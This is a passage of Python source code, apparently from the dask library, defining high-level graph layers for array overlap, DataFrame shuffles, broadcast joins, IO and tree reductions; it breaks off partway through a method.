from __future__ import annotations import functools import math import operator from collections import defaultdict from itertools import product from typing import Any import tlz as toolz from tlz.curried import map from .base import tokenize from .blockwise import Blockwise, BlockwiseDep, BlockwiseDepDict, blockwise_token from .core import flatten, keys_in_tasks from .highlevelgraph import Layer from .utils import ( apply, cached_cumsum, concrete, insert, stringify, stringify_collection_keys, ) # ## ### General Utilities ## # class CallableLazyImport: """Function Wrapper for Lazy Importing. This Class should only be used when materializing a graph on a distributed scheduler. """ def __init__(self, function_path): self.function_path = function_path def __call__(self, *args, **kwargs): from distributed.utils import import_term return import_term(self.function_path)(*args, **kwargs) # ## ### Array Layers & Utilities ## # class ArrayBlockwiseDep(BlockwiseDep): """ Blockwise dep for array-likes, which only needs chunking information to compute its data. """ chunks: tuple[tuple[int, ...], ...] numblocks: tuple[int, ...] produces_tasks: bool = False def __init__(self, chunks: tuple[tuple[int, ...], ...]): self.chunks = chunks self.numblocks = tuple(len(chunk) for chunk in chunks) self.produces_tasks = False def __getitem__(self, idx: tuple[int, ...]): raise NotImplementedError("Subclasses must implement __getitem__") def __dask_distributed_pack__( self, required_indices: list[tuple[int, ...]] | None = None ): return {"chunks": self.chunks} @classmethod def __dask_distributed_unpack__(cls, state): return cls(**state) class ArrayChunkShapeDep(ArrayBlockwiseDep): """Produce chunk shapes given a chunk index""" def __getitem__(self, idx: tuple[int, ...]): return tuple(chunk[i] for i, chunk in zip(idx, self.chunks)) class ArraySliceDep(ArrayBlockwiseDep): """Produce slice(s) into the full-sized array given a chunk index""" starts: tuple[tuple[int, ...], ...] def __init__(self, chunks: tuple[tuple[int, ...], ...]): super().__init__(chunks) self.starts = tuple(cached_cumsum(c, initial_zero=True) for c in chunks) def __getitem__(self, idx: tuple): loc = tuple((start[i], start[i + 1]) for i, start in zip(idx, self.starts)) return tuple(slice(*s, None) for s in loc) class ArrayOverlapLayer(Layer): """Simple HighLevelGraph array overlap layer. Lazily computed High-level graph layer for a array overlap operations. Parameters ---------- name : str Name of new output overlap array. array : Dask array axes: Mapping Axes dictionary indicating overlap in each dimension, e.g. ``{'0': 1, '1': 1}`` """ def __init__( self, name, axes, chunks, numblocks, token, ): super().__init__() self.name = name self.axes = axes self.chunks = chunks self.numblocks = numblocks self.token = token self._cached_keys = None def __repr__(self): return f"ArrayOverlapLayer<name='{self.name}'" @property def _dict(self): """Materialize full dict representation""" if hasattr(self, "_cached_dict"): return self._cached_dict else: dsk = self._construct_graph() self._cached_dict = dsk return self._cached_dict def __getitem__(self, key): return self._dict[key] def __iter__(self): return iter(self._dict) def __len__(self): return len(self._dict) def is_materialized(self): return hasattr(self, "_cached_dict") def get_output_keys(self): return self.keys() # FIXME! 
this implementation materializes the graph def _dask_keys(self): if self._cached_keys is not None: return self._cached_keys name, chunks, numblocks = self.name, self.chunks, self.numblocks def keys(*args): if not chunks: return [(name,)] ind = len(args) if ind + 1 == len(numblocks): result = [(name,) + args + (i,) for i in range(numblocks[ind])] else: result = [keys(*(args + (i,))) for i in range(numblocks[ind])] return result self._cached_keys = result = keys() return result def _construct_graph(self, deserializing=False): """Construct graph for a simple overlap operation.""" axes = self.axes chunks = self.chunks name = self.name dask_keys = self._dask_keys() getitem_name = "getitem-" + self.token overlap_name = "overlap-" + self.token if deserializing: # Use CallableLazyImport objects to avoid importing dataframe # module on the scheduler concatenate3 = CallableLazyImport("dask.array.core.concatenate3") else: # Not running on distributed scheduler - Use explicit functions from dask.array.core import concatenate3 dims = list(map(len, chunks)) expand_key2 = functools.partial( _expand_keys_around_center, dims=dims, axes=axes ) # Make keys for each of the surrounding sub-arrays interior_keys = toolz.pipe( dask_keys, flatten, map(expand_key2), map(flatten), toolz.concat, list ) interior_slices = {} overlap_blocks = {} for k in interior_keys: frac_slice = fractional_slice((name,) + k, axes) if (name,) + k != frac_slice: interior_slices[(getitem_name,) + k] = frac_slice else: interior_slices[(getitem_name,) + k] = (name,) + k overlap_blocks[(overlap_name,) + k] = ( concatenate3, (concrete, expand_key2((None,) + k, name=getitem_name)), ) dsk = toolz.merge(interior_slices, overlap_blocks) return dsk @classmethod def __dask_distributed_unpack__(cls, state): return cls(**state)._construct_graph(deserializing=True) def _expand_keys_around_center(k, dims, name=None, axes=None): """Get all neighboring keys around center Parameters ---------- k: tuple They key around which to generate new keys dims: Sequence[int] The number of chunks in each dimension name: Option[str] The name to include in the output keys, or none to include no name axes: Dict[int, int] The axes active in the expansion. 
We don't expand on non-active axes Examples -------- >>> _expand_keys_around_center(('x', 2, 3), dims=[5, 5], name='y', axes={0: 1, 1: 1}) # noqa: E501 # doctest: +NORMALIZE_WHITESPACE [[('y', 1.1, 2.1), ('y', 1.1, 3), ('y', 1.1, 3.9)], [('y', 2, 2.1), ('y', 2, 3), ('y', 2, 3.9)], [('y', 2.9, 2.1), ('y', 2.9, 3), ('y', 2.9, 3.9)]] >>> _expand_keys_around_center(('x', 0, 4), dims=[5, 5], name='y', axes={0: 1, 1: 1}) # noqa: E501 # doctest: +NORMALIZE_WHITESPACE [[('y', 0, 3.1), ('y', 0, 4)], [('y', 0.9, 3.1), ('y', 0.9, 4)]] """ def inds(i, ind): rv = [] if ind - 0.9 > 0: rv.append(ind - 0.9) rv.append(ind) if ind + 0.9 < dims[i] - 1: rv.append(ind + 0.9) return rv shape = [] for i, ind in enumerate(k[1:]): num = 1 if ind > 0: num += 1 if ind < dims[i] - 1: num += 1 shape.append(num) args = [ inds(i, ind) if any((axes.get(i, 0),)) else [ind] for i, ind in enumerate(k[1:]) ] if name is not None: args = [[name]] + args seq = list(product(*args)) shape2 = [d if any((axes.get(i, 0),)) else 1 for i, d in enumerate(shape)] result = reshapelist(shape2, seq) return result def reshapelist(shape, seq): """Reshape iterator to nested shape >>> reshapelist((2, 3), range(6)) [[0, 1, 2], [3, 4, 5]] """ if len(shape) == 1: return list(seq) else: n = int(len(seq) / shape[0]) return [reshapelist(shape[1:], part) for part in toolz.partition(n, seq)] def fractional_slice(task, axes): """ >>> fractional_slice(('x', 5.1), {0: 2}) (<built-in function getitem>, ('x', 5), (slice(-2, None, None),)) >>> fractional_slice(('x', 3, 5.1), {0: 2, 1: 3}) (<built-in function getitem>, ('x', 3, 5), (slice(None, None, None), slice(-3, None, None))) >>> fractional_slice(('x', 2.9, 5.1), {0: 2, 1: 3}) (<built-in function getitem>, ('x', 3, 5), (slice(0, 2, None), slice(-3, None, None))) """ rounded = (task[0],) + tuple(int(round(i)) for i in task[1:]) index = [] for i, (t, r) in enumerate(zip(task[1:], rounded[1:])): depth = axes.get(i, 0) if isinstance(depth, tuple): left_depth = depth[0] right_depth = depth[1] else: left_depth = depth right_depth = depth if t == r: index.append(slice(None, None, None)) elif t < r and right_depth: index.append(slice(0, right_depth)) elif t > r and left_depth: index.append(slice(-left_depth, None)) else: index.append(slice(0, 0)) index = tuple(index) if all(ind == slice(None, None, None) for ind in index): return task else: return (operator.getitem, rounded, index) # ## ### DataFrame Layers & Utilities ## # class SimpleShuffleLayer(Layer): """Simple HighLevelGraph Shuffle layer High-level graph layer for a simple shuffle operation in which each output partition depends on all input partitions. Parameters ---------- name : str Name of new shuffled output collection. column : str or list of str Column(s) to be used to map rows to output partitions (by hashing). npartitions : int Number of output partitions. npartitions_input : int Number of partitions in the original (un-shuffled) DataFrame. ignore_index: bool, default False Ignore index during shuffle. If ``True``, performance may improve, but index values will not be preserved. name_input : str Name of input collection. meta_input : pd.DataFrame-like object Empty metadata of input collection. parts_out : list of int (optional) List of required output-partition indices. 
    annotations : dict (optional)
        Layer annotations
    """

    def __init__(
        self,
        name,
        column,
        npartitions,
        npartitions_input,
        ignore_index,
        name_input,
        meta_input,
        parts_out=None,
        annotations=None,
    ):
        super().__init__(annotations=annotations)
        self.name = name
        self.column = column
        self.npartitions = npartitions
        self.npartitions_input = npartitions_input
        self.ignore_index = ignore_index
        self.name_input = name_input
        self.meta_input = meta_input
        self.parts_out = parts_out or range(npartitions)
        self.split_name = "split-" + self.name

        # The scheduling policy of Dask is generally depth-first,
        # which works great in most cases. However, in case of shuffle,
        # it increases the memory usage significantly. This is because
        # depth-first delays the freeing of the result of `shuffle_group()`
        # until the end of the shuffling.
        #
        # We address this by manually setting a high "priority" to the
        # `getitem()` ("split") tasks, using annotations. This forces a
        # breadth-first scheduling of the tasks that directly depend on
        # the `shuffle_group()` output, allowing that data to be freed
        # much earlier.
        #
        # See https://github.com/dask/dask/pull/6051 for a detailed discussion.
        self.annotations = self.annotations or {}
        if "priority" not in self.annotations:
            self.annotations["priority"] = {}
            self.annotations["priority"]["__expanded_annotations__"] = None
            self.annotations["priority"].update(
                {_key: 1 for _key in self.get_split_keys()}
            )

    def get_split_keys(self):
        # Return SimpleShuffleLayer "split" keys
        return [
            stringify((self.split_name, part_out, part_in))
            for part_in in range(self.npartitions_input)
            for part_out in self.parts_out
        ]

    def get_output_keys(self):
        return {(self.name, part) for part in self.parts_out}

    def __repr__(self):
        return "SimpleShuffleLayer<name='{}', npartitions={}>".format(
            self.name, self.npartitions
        )

    def is_materialized(self):
        return hasattr(self, "_cached_dict")

    @property
    def _dict(self):
        """Materialize full dict representation"""
        if hasattr(self, "_cached_dict"):
            return self._cached_dict
        else:
            dsk = self._construct_graph()
            self._cached_dict = dsk
            return self._cached_dict

    def __getitem__(self, key):
        return self._dict[key]

    def __iter__(self):
        return iter(self._dict)

    def __len__(self):
        return len(self._dict)

    def _keys_to_parts(self, keys):
        """Simple utility to convert keys to partition indices."""
        parts = set()
        for key in keys:
            try:
                _name, _part = key
            except ValueError:
                continue
            if _name != self.name:
                continue
            parts.add(_part)
        return parts

    def _cull_dependencies(self, keys, parts_out=None):
        """Determine the necessary dependencies to produce `keys`.

        For a simple shuffle, output partitions always depend on
        all input partitions. This method does not require graph
        materialization.
        """
        deps = defaultdict(set)
        parts_out = parts_out or self._keys_to_parts(keys)
        for part in parts_out:
            deps[(self.name, part)] |= {
                (self.name_input, i) for i in range(self.npartitions_input)
            }
        return deps

    def _cull(self, parts_out):
        return SimpleShuffleLayer(
            self.name,
            self.column,
            self.npartitions,
            self.npartitions_input,
            self.ignore_index,
            self.name_input,
            self.meta_input,
            parts_out=parts_out,
        )

    def cull(self, keys, all_keys):
        """Cull a SimpleShuffleLayer HighLevelGraph layer.

        The underlying graph will only include the necessary
        tasks to produce the keys (indices) included in `parts_out`.
        Therefore, "culling" the layer only requires us to reset this
        parameter.
""" parts_out = self._keys_to_parts(keys) culled_deps = self._cull_dependencies(keys, parts_out=parts_out) if parts_out != set(self.parts_out): culled_layer = self._cull(parts_out) return culled_layer, culled_deps else: return self, culled_deps def __reduce__(self): attrs = [ "name", "column", "npartitions", "npartitions_input", "ignore_index", "name_input", "meta_input", "parts_out", "annotations", ] return (SimpleShuffleLayer, tuple(getattr(self, attr) for attr in attrs)) def __dask_distributed_pack__( self, all_hlg_keys, known_key_dependencies, client, client_keys ): from distributed.protocol.serialize import to_serialize return { "name": self.name, "column": self.column, "npartitions": self.npartitions, "npartitions_input": self.npartitions_input, "ignore_index": self.ignore_index, "name_input": self.name_input, "meta_input": to_serialize(self.meta_input), "parts_out": list(self.parts_out), } @classmethod def __dask_distributed_unpack__(cls, state, dsk, dependencies): from distributed.worker import dumps_task # msgpack will convert lists into tuples, here # we convert them back to lists if isinstance(state["column"], tuple): state["column"] = list(state["column"]) if "inputs" in state: state["inputs"] = list(state["inputs"]) # Materialize the layer layer_dsk = cls(**state)._construct_graph(deserializing=True) # Convert all keys to strings and dump tasks layer_dsk = { stringify(k): stringify_collection_keys(v) for k, v in layer_dsk.items() } keys = layer_dsk.keys() | dsk.keys() # TODO: use shuffle-knowledge to calculate dependencies more efficiently deps = {k: keys_in_tasks(keys, [v]) for k, v in layer_dsk.items()} return {"dsk": toolz.valmap(dumps_task, layer_dsk), "deps": deps} def _construct_graph(self, deserializing=False): """Construct graph for a simple shuffle operation.""" shuffle_group_name = "group-" + self.name if deserializing: # Use CallableLazyImport objects to avoid importing dataframe # module on the scheduler concat_func = CallableLazyImport("dask.dataframe.core._concat") shuffle_group_func = CallableLazyImport( "dask.dataframe.shuffle.shuffle_group" ) else: # Not running on distributed scheduler - Use explicit functions from dask.dataframe.core import _concat as concat_func from dask.dataframe.shuffle import shuffle_group as shuffle_group_func dsk = {} for part_out in self.parts_out: _concat_list = [ (self.split_name, part_out, part_in) for part_in in range(self.npartitions_input) ] dsk[(self.name, part_out)] = ( concat_func, _concat_list, self.ignore_index, ) for _, _part_out, _part_in in _concat_list: dsk[(self.split_name, _part_out, _part_in)] = ( operator.getitem, (shuffle_group_name, _part_in), _part_out, ) if (shuffle_group_name, _part_in) not in dsk: dsk[(shuffle_group_name, _part_in)] = ( shuffle_group_func, (self.name_input, _part_in), self.column, 0, self.npartitions, self.npartitions, self.ignore_index, self.npartitions, ) return dsk class ShuffleLayer(SimpleShuffleLayer): """Shuffle-stage HighLevelGraph layer High-level graph layer corresponding to a single stage of a multi-stage inter-partition shuffle operation. Stage: (shuffle-group) -> (shuffle-split) -> (shuffle-join) Parameters ---------- name : str Name of new (partially) shuffled collection. column : str or list of str Column(s) to be used to map rows to output partitions (by hashing). inputs : list of tuples Each tuple dictates the data movement for a specific partition. stage : int Index of the current shuffle stage. npartitions : int Number of output partitions for the full (multi-stage) shuffle. 
npartitions_input : int Number of partitions in the original (un-shuffled) DataFrame. k : int A partition is split into this many groups during each stage. ignore_index: bool, default False Ignore index during shuffle. If ``True``, performance may improve, but index values will not be preserved. name_input : str Name of input collection. meta_input : pd.DataFrame-like object Empty metadata of input collection. parts_out : list of int (optional) List of required output-partition indices. annotations : dict (optional) Layer annotations """ def __init__( self, name, column, inputs, stage, npartitions, npartitions_input, nsplits, ignore_index, name_input, meta_input, parts_out=None, annotations=None, ): self.inputs = inputs self.stage = stage self.nsplits = nsplits super().__init__( name, column, npartitions, npartitions_input, ignore_index, name_input, meta_input, parts_out=parts_out or range(len(inputs)), annotations=annotations, ) def get_split_keys(self): # Return ShuffleLayer "split" keys keys = [] for part in self.parts_out: out = self.inputs[part] for i in range(self.nsplits): keys.append( stringify( ( self.split_name, out[self.stage], insert(out, self.stage, i), ) ) ) return keys def __repr__(self): return "ShuffleLayer<name='{}', stage={}, nsplits={}, npartitions={}>".format( self.name, self.stage, self.nsplits, self.npartitions ) def __reduce__(self): attrs = [ "name", "column", "inputs", "stage", "npartitions", "npartitions_input", "nsplits", "ignore_index", "name_input", "meta_input", "parts_out", "annotations", ] return (ShuffleLayer, tuple(getattr(self, attr) for attr in attrs)) def __dask_distributed_pack__(self, *args, **kwargs): ret = super().__dask_distributed_pack__(*args, **kwargs) ret["inputs"] = self.inputs ret["stage"] = self.stage ret["nsplits"] = self.nsplits return ret def _cull_dependencies(self, keys, parts_out=None): """Determine the necessary dependencies to produce `keys`. Does not require graph materialization. 
""" deps = defaultdict(set) parts_out = parts_out or self._keys_to_parts(keys) inp_part_map = {inp: i for i, inp in enumerate(self.inputs)} for part in parts_out: out = self.inputs[part] for k in range(self.nsplits): _inp = insert(out, self.stage, k) _part = inp_part_map[_inp] if self.stage == 0 and _part >= self.npartitions_input: deps[(self.name, part)].add(("group-" + self.name, _inp, "empty")) else: deps[(self.name, part)].add((self.name_input, _part)) return deps def _cull(self, parts_out): return ShuffleLayer( self.name, self.column, self.inputs, self.stage, self.npartitions, self.npartitions_input, self.nsplits, self.ignore_index, self.name_input, self.meta_input, parts_out=parts_out, ) def _construct_graph(self, deserializing=False): """Construct graph for a "rearrange-by-column" stage.""" shuffle_group_name = "group-" + self.name if deserializing: # Use CallableLazyImport objects to avoid importing dataframe # module on the scheduler concat_func = CallableLazyImport("dask.dataframe.core._concat") shuffle_group_func = CallableLazyImport( "dask.dataframe.shuffle.shuffle_group" ) else: # Not running on distributed scheduler - Use explicit functions from dask.dataframe.core import _concat as concat_func from dask.dataframe.shuffle import shuffle_group as shuffle_group_func dsk = {} inp_part_map = {inp: i for i, inp in enumerate(self.inputs)} for part in self.parts_out: out = self.inputs[part] _concat_list = [] # get_item tasks to concat for this output partition for i in range(self.nsplits): # Get out each individual dataframe piece from the dicts _inp = insert(out, self.stage, i) _idx = out[self.stage] _concat_list.append((self.split_name, _idx, _inp)) # concatenate those pieces together, with their friends dsk[(self.name, part)] = ( concat_func, _concat_list, self.ignore_index, ) for _, _idx, _inp in _concat_list: dsk[(self.split_name, _idx, _inp)] = ( operator.getitem, (shuffle_group_name, _inp), _idx, ) if (shuffle_group_name, _inp) not in dsk: # Initial partitions (output of previous stage) _part = inp_part_map[_inp] if self.stage == 0: if _part < self.npartitions_input: input_key = (self.name_input, _part) else: # In order to make sure that to_serialize() serialize the # empty dataframe input, we add it as a key. input_key = (shuffle_group_name, _inp, "empty") dsk[input_key] = self.meta_input else: input_key = (self.name_input, _part) # Convert partition into dict of dataframe pieces dsk[(shuffle_group_name, _inp)] = ( shuffle_group_func, input_key, self.column, self.stage, self.nsplits, self.npartitions_input, self.ignore_index, self.npartitions, ) return dsk class BroadcastJoinLayer(Layer): """Broadcast-based Join Layer High-level graph layer for a join operation requiring the smaller collection to be broadcasted to every partition of the larger collection. Parameters ---------- name : str Name of new (joined) output collection. lhs_name: string "Left" DataFrame collection to join. lhs_npartitions: int Number of partitions in "left" DataFrame collection. rhs_name: string "Right" DataFrame collection to join. rhs_npartitions: int Number of partitions in "right" DataFrame collection. parts_out : list of int (optional) List of required output-partition indices. annotations : dict (optional) Layer annotations. **merge_kwargs : **dict Keyword arguments to be passed to chunkwise merge func. 
""" def __init__( self, name, npartitions, lhs_name, lhs_npartitions, rhs_name, rhs_npartitions, parts_out=None, annotations=None, **merge_kwargs, ): super().__init__(annotations=annotations) self.name = name self.npartitions = npartitions self.lhs_name = lhs_name self.lhs_npartitions = lhs_npartitions self.rhs_name = rhs_name self.rhs_npartitions = rhs_npartitions self.parts_out = parts_out or set(range(self.npartitions)) self.merge_kwargs = merge_kwargs self.how = self.merge_kwargs.get("how") self.left_on = self.merge_kwargs.get("left_on") self.right_on = self.merge_kwargs.get("right_on") if isinstance(self.left_on, list): self.left_on = (list, tuple(self.left_on)) if isinstance(self.right_on, list): self.right_on = (list, tuple(self.right_on)) def get_output_keys(self): return {(self.name, part) for part in self.parts_out} def __repr__(self): return "BroadcastJoinLayer<name='{}', how={}, lhs={}, rhs={}>".format( self.name, self.how, self.lhs_name, self.rhs_name ) def is_materialized(self): return hasattr(self, "_cached_dict") @property def _dict(self): """Materialize full dict representation""" if hasattr(self, "_cached_dict"): return self._cached_dict else: dsk = self._construct_graph() self._cached_dict = dsk return self._cached_dict def __getitem__(self, key): return self._dict[key] def __iter__(self): return iter(self._dict) def __len__(self): return len(self._dict) def __dask_distributed_pack__(self, *args, **kwargs): import pickle # Pickle complex merge_kwargs elements. Also # tuples, which may be confused with keys. _merge_kwargs = {} for k, v in self.merge_kwargs.items(): if not isinstance(v, (str, list, bool)): _merge_kwargs[k] = pickle.dumps(v) else: _merge_kwargs[k] = v return { "name": self.name, "npartitions": self.npartitions, "lhs_name": self.lhs_name, "lhs_npartitions": self.lhs_npartitions, "rhs_name": self.rhs_name, "rhs_npartitions": self.rhs_npartitions, "parts_out": self.parts_out, "merge_kwargs": _merge_kwargs, } @classmethod def __dask_distributed_unpack__(cls, state, dsk, dependencies): from distributed.worker import dumps_task # Expand merge_kwargs merge_kwargs = state.pop("merge_kwargs", {}) state.update(merge_kwargs) # Materialize the layer raw = cls(**state)._construct_graph(deserializing=True) # Convert all keys to strings and dump tasks raw = {stringify(k): stringify_collection_keys(v) for k, v in raw.items()} keys = raw.keys() | dsk.keys() deps = {k: keys_in_tasks(keys, [v]) for k, v in raw.items()} return {"dsk": toolz.valmap(dumps_task, raw), "deps": deps} def _keys_to_parts(self, keys): """Simple utility to convert keys to partition indices.""" parts = set() for key in keys: try: _name, _part = key except ValueError: continue if _name != self.name: continue parts.add(_part) return parts @property def _broadcast_plan(self): # Return structure (tuple): # ( # <broadcasted-collection-name>, # <broadcasted-collection-npartitions>, # <other-collection-npartitions>, # <other-collection-on>, # ) if self.lhs_npartitions < self.rhs_npartitions: # Broadcasting the left return ( self.lhs_name, self.lhs_npartitions, self.rhs_name, self.right_on, ) else: # Broadcasting the right return ( self.rhs_name, self.rhs_npartitions, self.lhs_name, self.left_on, ) def _cull_dependencies(self, keys, parts_out=None): """Determine the necessary dependencies to produce `keys`. For a broadcast join, output partitions always depend on all partitions of the broadcasted collection, but only one partition of the "other" collecction. 
""" # Get broadcast info bcast_name, bcast_size, other_name = self._broadcast_plan[:3] deps = defaultdict(set) parts_out = parts_out or self._keys_to_parts(keys) for part in parts_out: deps[(self.name, part)] |= {(bcast_name, i) for i in range(bcast_size)} deps[(self.name, part)] |= { (other_name, part), } return deps def _cull(self, parts_out): return BroadcastJoinLayer( self.name, self.npartitions, self.lhs_name, self.lhs_npartitions, self.rhs_name, self.rhs_npartitions, annotations=self.annotations, parts_out=parts_out, **self.merge_kwargs, ) def cull(self, keys, all_keys): """Cull a BroadcastJoinLayer HighLevelGraph layer. The underlying graph will only include the necessary tasks to produce the keys (indicies) included in `parts_out`. Therefore, "culling" the layer only requires us to reset this parameter. """ parts_out = self._keys_to_parts(keys) culled_deps = self._cull_dependencies(keys, parts_out=parts_out) if parts_out != set(self.parts_out): culled_layer = self._cull(parts_out) return culled_layer, culled_deps else: return self, culled_deps def _construct_graph(self, deserializing=False): """Construct graph for a broadcast join operation.""" inter_name = "inter-" + self.name split_name = "split-" + self.name if deserializing: # Use CallableLazyImport objects to avoid importing dataframe # module on the scheduler split_partition_func = CallableLazyImport( "dask.dataframe.multi._split_partition" ) concat_func = CallableLazyImport("dask.dataframe.multi._concat_wrapper") merge_chunk_func = CallableLazyImport( "dask.dataframe.multi._merge_chunk_wrapper" ) else: # Not running on distributed scheduler - Use explicit functions from dask.dataframe.multi import _concat_wrapper as concat_func from dask.dataframe.multi import _merge_chunk_wrapper as merge_chunk_func from dask.dataframe.multi import _split_partition as split_partition_func # Get broadcast "plan" bcast_name, bcast_size, other_name, other_on = self._broadcast_plan bcast_side = "left" if self.lhs_npartitions < self.rhs_npartitions else "right" # Loop over output partitions, which should be a 1:1 # mapping with the input partitions of "other". # Culling should allow us to avoid generating tasks for # any output partitions that are not requested (via `parts_out`) dsk = {} for i in self.parts_out: # Split each "other" partition by hash if self.how != "inner": dsk[(split_name, i)] = ( split_partition_func, (other_name, i), other_on, bcast_size, ) # For each partition of "other", we need to join # to each partition of "bcast". If it is a "left" # or "right" join, there should be a unique mapping # between the local splits of "other" and the # partitions of "bcast" (which means we need an # additional `getitem` operation to isolate the # correct split of each "other" partition). _concat_list = [] for j in range(bcast_size): # Specify arg list for `merge_chunk` _merge_args = [ ( operator.getitem, (split_name, i), j, ) if self.how != "inner" else (other_name, i), (bcast_name, j), ] if bcast_side == "left": # If the left is broadcasted, the # arg list needs to be reversed _merge_args.reverse() inter_key = (inter_name, i, j) dsk[inter_key] = ( apply, merge_chunk_func, _merge_args, self.merge_kwargs, ) _concat_list.append(inter_key) # Concatenate the merged results for each output partition dsk[(self.name, i)] = (concat_func, _concat_list) return dsk class DataFrameIOLayer(Blockwise): """DataFrame-based Blockwise Layer with IO Parameters ---------- name : str Name to use for the constructed layer. 
columns : str, list or None Field name(s) to read in as columns in the output. inputs : list[tuple] List of arguments to be passed to ``io_func`` so that the materialized task to produce partition ``i`` will be: ``(<io_func>, inputs[i])``. Note that each element of ``inputs`` is typically a tuple of arguments. io_func : callable A callable function that takes in a single tuple of arguments, and outputs a DataFrame partition. label : str (optional) String to use as a prefix in the place-holder collection name. If nothing is specified (default), "subset-" will be used. produces_tasks : bool (optional) Whether one or more elements of `inputs` is expected to contain a nested task. This argument in only used for serialization purposes, and will be deprecated in the future. Default is False. creation_info: dict (optional) Dictionary containing the callable function ('func'), positional arguments ('args'), and key-word arguments ('kwargs') used to produce the dask collection with this underlying ``DataFrameIOLayer``. annotations: dict (optional) Layer annotations to pass through to Blockwise. """ def __init__( self, name, columns, inputs, io_func, label=None, produces_tasks=False, creation_info=None, annotations=None, ): self.name = name self.columns = columns self.inputs = inputs self.io_func = io_func self.label = label self.produces_tasks = produces_tasks self.annotations = annotations self.creation_info = creation_info # Define mapping between key index and "part" io_arg_map = BlockwiseDepDict( {(i,): inp for i, inp in enumerate(self.inputs)}, produces_tasks=self.produces_tasks, ) # Use Blockwise initializer dsk = {self.name: (io_func, blockwise_token(0))} super().__init__( output=self.name, output_indices="i", dsk=dsk, indices=[(io_arg_map, "i")], numblocks={}, annotations=annotations, ) def project_columns(self, columns): """Produce a column projection for this IO layer. Given a list of required output columns, this method returns the projected layer. """ if columns and (self.columns is None or columns < set(self.columns)): # Apply column projection in IO function try: io_func = self.io_func.project_columns(list(columns)) except AttributeError: io_func = self.io_func layer = DataFrameIOLayer( (self.label or "subset-") + tokenize(self.name, columns), list(columns), self.inputs, io_func, label=self.label, produces_tasks=self.produces_tasks, annotations=self.annotations, ) return layer else: # Default behavior return self def __repr__(self): return "DataFrameIOLayer<name='{}', n_parts={}, columns={}>".format( self.name, len(self.inputs), self.columns ) class DataFrameTreeReduction(Layer): """DataFrame Tree-Reduction Layer Parameters ---------- name : str Name to use for the constructed layer. name_input : str Name of the input layer that is being reduced. npartitions_input : str Number of partitions in the input layer. concat_func : callable Function used by each tree node to reduce a list of inputs into a single output value. This function must accept only a list as its first positional argument. tree_node_func : callable Function used on the output of ``concat_func`` in each tree node. This function must accept the output of ``concat_func`` as its first positional argument. finalize_func : callable, optional Function used in place of ``tree_node_func`` on the final tree node(s) to produce the final output for each split. By default, ``tree_node_func`` will be used. split_every : int, optional This argument specifies the maximum number of input nodes to be handled by any one task in the tree. 
Defaults to 32. split_out : int, optional This argument specifies the number of output nodes in the reduction tree. If ``split_out`` is set to an integer >=1, the input tasks must contain data that can be indexed by a ``getitem`` operation with a key in the range ``[0, split_out)``. output_partitions : list, optional List of required output partitions. This parameter is used internally by Dask for high-level culling. tree_node_name : str, optional Name to use for intermediate tree-node tasks. """ name: str name_input: str npartitions_input: str concat_func: callable tree_node_func: callable finalize_func: callable | None split_every: int split_out: int output_partitions: list[int] tree_node_name: str widths: list[int] height: int def __init__( self, name: str, name_input: str, npartitions_input: str, concat_func: callable, tree_node_func: callable, finalize_func: callable | None = None, split_every: int = 32, split_out: int | None = None, output_partitions: list[int] | None = None, tree_node_name: str | None = None, annotations: dict[str, Any] | None = None, ): super().__init__(annotations=annotations) self.name = name self.name_input = name_input self.npartitions_input = npartitions_input self.concat_func = concat_func self.tree_node_func = tree_node_func self.finalize_func = finalize_func self.split_every = split_every self.split_out = split_out self.output_partitions = ( list(range(self.split_out or 1)) if output_partitions is None else output_partitions ) self.tree_node_name = tree_node_name or "tree_node-" + self.name # Calculate tree widths and height # (Used to get output keys without materializing) parts = self.npartitions_input self.widths = [parts] while parts > 1: parts = math.ceil(parts / self.split_every) self.widths.append(parts) self.height = len(self.widths) def _make_key(self, *name_parts, split=0): # Helper function construct a key # with a "split" element when # bool(split_out) is True return name_parts + (split,) if self.split_out else name_parts def _define_task(self, input_keys, final_task=False): # Define nested concatenation and func task if final_task and self.finalize_func: outer_func = self.finalize_func else: outer_func = self.tree_node_func return (toolz.pipe, input_keys, self.concat_func, outer_func) def _construct_graph(self): """Construct graph for a tree reduction.""" dsk = {} if not self.output_partitions: return dsk # Deal with `bool(split_out) == True`. 
# These cases require that the input tasks # return a type that enables getitem operation # with indices: [0, split_out) # Therefore, we must add "getitem" tasks to # select the appropriate element for each split name_input_use = self.name_input if self.split_out: name_input_use += "-split" for s in self.output_partitions: for p in range(self.npartitions_input): dsk[self._make_key(name_input_use, p, split=s)] = ( operator.getitem, (self.name_input, p), s, ) if self.height >= 2: # Loop over output splits for s in self.output_partitions: # Loop over reduction levels for depth in range(1, self.height): # Loop over reduction groups for group in range(self.widths[depth]): # Calculate inputs for the current group p_max = self.widths[depth - 1] lstart = self.split_every * group lstop = min(lstart + self.split_every, p_max) if depth == 1: # Input nodes are from input layer input_keys = [ self._make_key(name_input_use, p, split=s) for p in range(lstart, lstop) ] else: # Input nodes are tree-reduction nodes input_keys = [ self._make_key( self.tree_node_name, p, depth - 1, split=s ) for p in range(lstart, lstop) ] # Define task if depth == self.height - 1: # Final Node (Use fused `self.tree_finalize` task) assert ( group == 0 ), f"group = {group}, not 0 for final tree reduction task" dsk[(self.name, s)] = self._define_task( input_keys, final_task=True ) else: # Intermediate Node dsk[ self._make_key( self.tree_node_name, group, depth, split=s ) ] = self._define_task(input_keys, final_task=False) else: # Deal with single-partition case for s in self.output_partitions: input_keys = [self._make_key(name_input_use, 0, split=s)] dsk[(self.name, s)] = self._define_task(input_keys, final_task=True) return dsk def __repr__(self): return "DataFrameTreeReduction<name='{}', input_name={}, split_out={}>".format( self.name, self.name_input, self.split_out ) def _output_keys(self): return {(self.name, s) for s in self.output_partitions} def get_output_keys(self): if hasattr(self, "_cached_output_keys"): return self._cached_output_keys else: output_keys = self._output_keys() self._cached_output_keys = output_keys return self._cached_output_keys def is_materialized(self): return hasattr(self, "_cached_dict") @property def _dict(self): """Materialize full dict representation""" if hasattr(self, "_cached_dict"): return self._cached_dict else: dsk = self._construct_graph() self._cached_dict = dsk return self._cached_dict def __getitem__(self, key): return self._dict[key] def __iter__(self): return iter(self._dict) def __len__(self): # Start with "base" tree-reduction size tree_size = (sum(self.widths[1:]) or 1) * (self.split_out or 1) if self.split_out: # Add on "split-*" tasks used for `getitem` ops return tree_size + self.npartitions_input * len(self.output_partitions) return tree_size def _keys_to_output_partitions(self, keys): """Simple utility to convert keys to output partition indices.""" splits = set() for key in keys: try: _name, _split = key except ValueError: continue if _name != self.name: continue splits.add(_split) return splits def _cull(self, output_partitions): return DataFrameTreeReduction( self.name, 